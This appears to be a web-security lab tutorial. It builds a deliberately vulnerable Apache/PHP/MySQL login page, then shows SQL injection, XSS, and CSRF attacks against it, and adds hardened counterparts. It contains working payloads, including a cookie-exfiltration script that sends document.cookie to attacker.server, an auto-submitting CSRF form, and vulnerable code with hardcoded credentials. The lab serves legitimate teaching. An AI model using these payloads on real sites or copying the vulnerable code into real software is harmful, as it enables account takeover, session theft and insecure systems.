Web Authentication Implementation and Common Vulnerability Exploitation
HTML Frontend Construction
Deploy Apache web server and verify functionality via loopback address. Create authentication interfaces within the web root directory.
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Secure Portal</title>
    <style>
        body {
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            font-family: Arial, sans-serif;
            background: #f5f5f5;
        }
        .auth-form {
            background: white;
            padding: 2rem;
            border-radius: 8px;
            box-shadow: 0 2px 10px rgba(0,0,0,0.1);
            width: 320px;
        }
        input {
            width: 100%;
            padding: 8px;
            margin: 8px 0;
            border: 1px solid #ddd;
            border-radius: 4px;
            box-sizing: border-box;
        }
        button {
            width: 100%;
            padding: 10px;
            background: #007bff;
            color: white;
            border: none;
            border-radius: 4px;
            cursor: pointer;
        }
    </style>
</head>
<body>
    <div class="auth-form">
        <h2>System Login</h2>
        <form method="post" action="process.php">
            <input type="text" id="acct" name="account" placeholder="Account ID" required>
            <input type="password" id="pwd" name="credential" placeholder="Password" required>
            <button type="button" onclick="verify()">Authenticate</button>
        </form>
    </div>
</body>
</html>
HTTP Method Characteristics
GET requests encode parameters in the URL, which is subject to length restrictions and exposes the data in browser history and server logs. POST transmits data in the request body, which keeps sensitive values out of URLs, history and access logs, supports larger payloads, and is not cached by the client by default. Neither method encrypts the data: confidentiality in transit depends on HTTPS.
JavaScript Validation and DOM Manipulation
Implement client-side verification and dynamic content rendering.
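<script>
function verify() {
    const acct = document.getElementById("acct").value;
    const pwd = document.getElementById("pwd").value;
    if (!acct || !pwd) {
        alert("Both fields are mandatory");
        return;
    }
    // Unsafe sink: acct is written into the page as HTML without any encoding,
    // which is what the injection tests in the next section rely on.
    document.write("<h1>Greetings, " + acct + "</h1>");
}
</script>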
Injection Testing
Test HTML injection via input fields: <h3>Injected Content</h3>
Execute arbitrary code through script tags: <script>alert('Compromised')</script>
MySQL Database Backend
Initialize database services and configure user access controls.
-- Initialize schema
CREATE DATABASE IF NOT EXISTS app_database CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci;
USE app_database;
-- Create restricted user account
CREATE USER 'db_operator'@'localhost' IDENTIFIED BY 'Op3r@t0r!';
GRANT SELECT, INSERT, UPDATE ON app_database.* TO 'db_operator'@'localhost';
FLUSH PRIVILEGES;
-- Define user storage table
CREATE TABLE credentials (
    uid INT AUTO_INCREMENT PRIMARY KEY,
    login_name VARCHAR(64) NOT NULL UNIQUE,
    secret_key VARCHAR(128) NOT NULL,
    registration_date TIMESTAMP DEFAULT CURRENT_TIMESTAMP
);
-- Seed test accounts
INSERT INTO credentials (login_name, secret_key) VALUES
('administrator', 'changeme'),
('guest', 'guest123');
PHP Backend Integration
Develop server-side authentication logic.
<?php
if ($_SERVER["REQUEST_METHOD"] == "POST") {
    $account = $_POST['account'];
    $credential = $_POST['credential'];
    $host = "localhost";
    $dbUser = "db_operator";
    $dbPass = "Op3r@t0r!";
    $dbName = "app_database";
    $connection = new mysqli($host, $dbUser, $dbPass, $dbName);
    if ($connection->connect_error) {
        die("Database connection failed: " . $connection->connect_error);
    }
    // Query constructed through string concatenation (vulnerable)
    $sqlCommand = "SELECT * FROM credentials WHERE login_name = '$account' AND secret_key = '$credential'";
    $queryResult = $connection->query($sqlCommand);
    if ($queryResult && $queryResult->num_rows > 0) {
        // $account is echoed back without output encoding (vulnerable)
        echo "<div style='color:green'>Access Granted: Welcome $account</div>";
    } else {
        echo "<div style='color:red'>Authentication Failed</div>";
    }
    $connection->close();
}
?>
Attack Vector Implementation
SQL Injection Exploitation
Authenticate without valid credentials using tautology attacks:
Payload: ' OR '1'='1' --
Execution Flow: The injected string terminates the original query condition and appends a universally true statement ('1'='1'), effectively converting the query to return all records regardless of password verification.
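A hardened counterpart of the login handler above, added here as an example and not part of the original page: the query uses a bound parameter, the password is checked with password_verify(), and the account name is encoded on output. It assumes the seed rows are re-stored with password_hash() output in secret_key, and APP_DB_USER / APP_DB_PASS are hypothetical environment variable names.

```php
<?php
declare(strict_types=1);
// Added example, not the page's code. Assumptions: secret_key holds password_hash()
// output, and APP_DB_USER / APP_DB_PASS are hypothetical environment variable names.

mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT); // throw instead of die()

function verifyLogin(mysqli $db, string $account, string $credential): bool
{
    // The placeholder keeps input out of the SQL text: ' OR '1'='1' -- is compared
    // as a literal login name and never parsed as part of the statement.
    $stmt = $db->prepare('SELECT secret_key FROM credentials WHERE login_name = ?');
    $stmt->bind_param('s', $account);
    $stmt->execute();
    $stmt->bind_result($storedHash);
    $found = $stmt->fetch();
    $stmt->close();

    // The password is checked in PHP against a salted hash, not inside the WHERE clause.
    return $found === true && password_verify($credential, $storedHash);
}

if (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST') {
    $account = $_POST['account'] ?? '';
    $credential = $_POST['credential'] ?? '';
    if (!is_string($account) || !is_string($credential)) { // e.g. account[]=x arrays
        http_response_code(400);
        exit('Bad request');
    }
    try {
        $db = new mysqli('localhost', getenv('APP_DB_USER') ?: null,
                         getenv('APP_DB_PASS') ?: null, 'app_database');
        $db->set_charset('utf8mb4');
        $ok = verifyLogin($db, $account, $credential);
        $db->close();
    } catch (mysqli_sql_exception $e) {
        error_log('login database error: ' . $e->getMessage()); // detail stays server-side
        http_response_code(500);
        exit('Service unavailable');
    }
    if ($ok) {
        // Encode on output so markup typed into the account field renders as text.
        $safe = htmlspecialchars($account, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
        echo "<div style='color:green'>Access Granted: Welcome $safe</div>";
    } else {
        echo "<div style='color:red'>Authentication Failed</div>";
    }
}
```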
Cross-Site Scripting (XSS)
Inject executable payloads through input vectors:
Basic Alert: <script>alert('XSS')</script>
Cookie Exfiltration: <script>fetch('http://attacker.server/log?data='+document.cookie)</script>
Security Testing Framework Deployment
Utilize Pikachu vulnerability platform for structured penetration testing.
Boolean-Based SQL Injection:
Inject conditional statements to extract database structure through true/false differential responses:
- True condition: ' AND 1=1#
- False condition: ' AND 1=2#
Reflected XSS:
Inject payloads into search parameters and URL fragments that execute within victim browser contexts without proper output encoding.
Cross-Site Request Forgery (CSRF):
Construct unauthorized state-changing requests:
- Capture legitimate profile modification requests via interception proxies
- Generate malicious HTML forms with pre-populated values:
<form action="http://target-site.com/modify_profile" method="POST" id="exploit">
<input type="hidden" name="contact_info" value="compromised@attacker.com">
</form>
<script>document.getElementById('exploit').submit();</script>
- Deploy on attacker-controlled domains and entice authenticated users to visit, triggering unintended profile modifications without anti-CSRF token validation.
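The control whose absence the last step depends on, added here as an example that is not from the page or the Pikachu project: a per-session anti-CSRF token issued with the profile form and verified before the change is applied. The csrf_token field name is hypothetical, and $_SESSION stands in for the real profile store.

```php
<?php
declare(strict_types=1);
// Added example, not the page's or Pikachu's code. Assumptions: the field name
// csrf_token is hypothetical and $_SESSION stands in for the profile store.

// SameSite keeps the session cookie off cross-site POSTs in browsers that enforce it;
// HttpOnly hides it from document.cookie. Add 'secure' => true when served over HTTPS.
session_set_cookie_params(['httponly' => true, 'samesite' => 'Lax']);
session_start();

function csrfToken(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32)); // 256-bit, per session
    }
    return $_SESSION['csrf_token'];
}

function csrfValid($submitted): bool
{
    $expected = $_SESSION['csrf_token'] ?? '';
    // hash_equals compares in constant time; a missing or array value fails closed.
    return is_string($submitted) && $expected !== '' && hash_equals($expected, $submitted);
}

if (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST') {
    // A form auto-submitted from another origin cannot read this session's token.
    if (!csrfValid($_POST['csrf_token'] ?? null)) {
        http_response_code(403);
        exit('Request rejected: missing or invalid CSRF token');
    }
    $contact = filter_var($_POST['contact_info'] ?? '', FILTER_VALIDATE_EMAIL);
    if ($contact === false) {
        http_response_code(400);
        exit('Invalid contact address');
    }
    $_SESSION['contact_info'] = $contact;
}
$token = htmlspecialchars(csrfToken(), ENT_QUOTES, 'UTF-8');
$current = htmlspecialchars($_SESSION['contact_info'] ?? '', ENT_QUOTES, 'UTF-8');
?>
<form method="POST">
    <input type="hidden" name="csrf_token" value="<?= $token ?>">
    <input type="email" name="contact_info" value="<?= $current ?>">
    <button type="submit">Save</button>
</form>
```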